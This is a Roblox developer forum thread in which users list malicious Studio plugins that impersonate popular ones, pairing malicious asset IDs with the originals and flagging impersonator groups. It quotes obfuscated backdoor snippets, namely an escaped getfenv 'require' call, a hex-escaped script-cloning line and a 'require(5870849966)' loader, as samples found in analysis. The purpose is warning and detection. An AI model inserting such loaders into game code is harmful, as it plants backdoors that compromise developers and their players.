Known Malicious Plugins for HISR detection Megathread

Malicious plugin: 5606261789
Original plugin: 4476041065

For that plugin alone, the friends of these users all look like bots. These are the only two non-bot people that are in the group that produced the malicious plugin.
Group: GizmoTjaz - Roblox --Probably trying to frame someone, actual person’s profile is here: GizmoTjaz - Roblox

DuazDaio: DuazDaio - Roblox

KaspersHub: KaspersHub - Roblox
I have a slight feeling these are stolen accounts, but I’m not sure.

Note: KaspersHub is also in a lot of other groups with similar logos.

I’m pretty sure it’s a backdoor group (and the bot accounts are possibly alts?)

Most likely, but the users I mentioned specifically have robux. I think they were stolen and then linked to all these bot accounts. Whoever did this was really good in covering their tracks. there are hundreds of bots.

1 Like

plugin checks for any and all scripts in the game and places multiple lines of requirements saying this
getfenv()[‘\114\101\113\117\105\114\101’][5151855975]

Malicious plugin: 6173331887
Original plugin: 866972013

I found another malicious plugin:

Real plugin (ID:6426578337) :

Fake Plugin (ID: 6427852822):

The fake plugin contains some malicious code:

workspace:WaitForChild("\0x54\0x65\0x72\0x72\0x61\0x69\0x6e"):FindFirstChild('\0x47\0x72\0x61\0x73\0x73\0x46\0x58')then a=script:WaitForChild("\0x47\0x72\0x61\0x73\0x73\0x46\0x58"):Clone()a.Parent=workspace:WaitForChild("\0x43\0x61\0x6d\0x65\0x72\0x61")a.Disabled=false;end

And also I found GrassFX script inside of the fake plugin:
image

And the code sample from the GrassFX script:

Thank you so much, this helped me out a LOT!

This is a virus: Smooth Cam - Roblox

the string is base64 for the into of The Prince of Belair


contains bytecode interpreters

1 Like

Also says it is created by @sleitnick that is a known plugin creator and his plugins are totally not malicious in anyway. Looks like the actual group is trying to impersonate.

1 Like

How has this not been shut down yet?? He has multiple groups that are obviously meant to impersonate well known developers and teams.

I also found this:

Image

Roblox Studio+

Malicious Plugin: 5871957158
Original Plugin: 144358935

Malicious Script Location: PluginGuiService > PluginGui > Layers > UIListLayout > FX
Malicious Action:

require(5870849966)

Malicious Required Module: 5870849966*

*Suspicious obfuscated code. Assuming this is the source of the backdoor that multiple posts above have connected with the Updated/New mark at the top of the plugin thumbnail.

The plugin was published by a group named ROBLOX to make it seem as if the official ROBLOX account created it.

ROBLOX Impersonation: 8135004

1 Like

I hooked the functions of the obfuscated module and it seems that it was only calling require to this module MainModule - Roblox

It has a GUI for a server side backdoor service called “Ubuntu SS” which I have never heard of here is a picture.

The logging place for HTTP logs is

and the group for whitelisting seems to be

The module also seems to contain some webhooks URLs but they seem invalid. I am not sure if they were previously used for logging and were removed, if they were abused and removed thus or are just decous.

2 Likes

Over half of these plugins are real, without any malicious intent.

1 Like

Plugins List:

(Both Malicious & the Original Included.)


Studio Levels

Malicious: Studio Levels - Roblox

Original: Studio Levels - Roblox

Moon Animator

Malicious: Moon Animator - Roblox

Original: Moon Animator 2 - Roblox


I WILL ADD MORE HERE SOON!

No plugin from the list is malicious.

I took a look at those plugin’s source and did not find anything. Also I see you have already posted 3 of those plugins already on this topic.

I just read through it’s source, turns out it was a mistake on my end. Sorry for re-posting, didn’t realize that.

1 Like

Building Tools by F3X (Plugin)

Malicious plugin: 6240474358
Original plugin: 144950355

[FIXED] Realism Mod

Malicious plugin: 6792716290
Original plugin: 400812710

Load Character Lite

Malicious plugin: 6789266789
Original plugin: 752585459

to be continued…

Someone apparently made a copy of AlreadyPro’s Load Character Pro under the name of “AlreadyPro” a group owned by a deleted account. Reported the plugin for using the code of AlreadyPro and also malicious code.

Malicious:

Original:

1 Like

Load Character Pro

Original: 4489766693
Malicious: 7070331213

source

Drops a malicious script. Malicious plugin creator attempting to impersonate AlreadyPro.

1 Like

Yes

I would also like to report this one as well: Malicious Plugin

It’s a group that impersonates his name to promote their fake plugin.

1 Like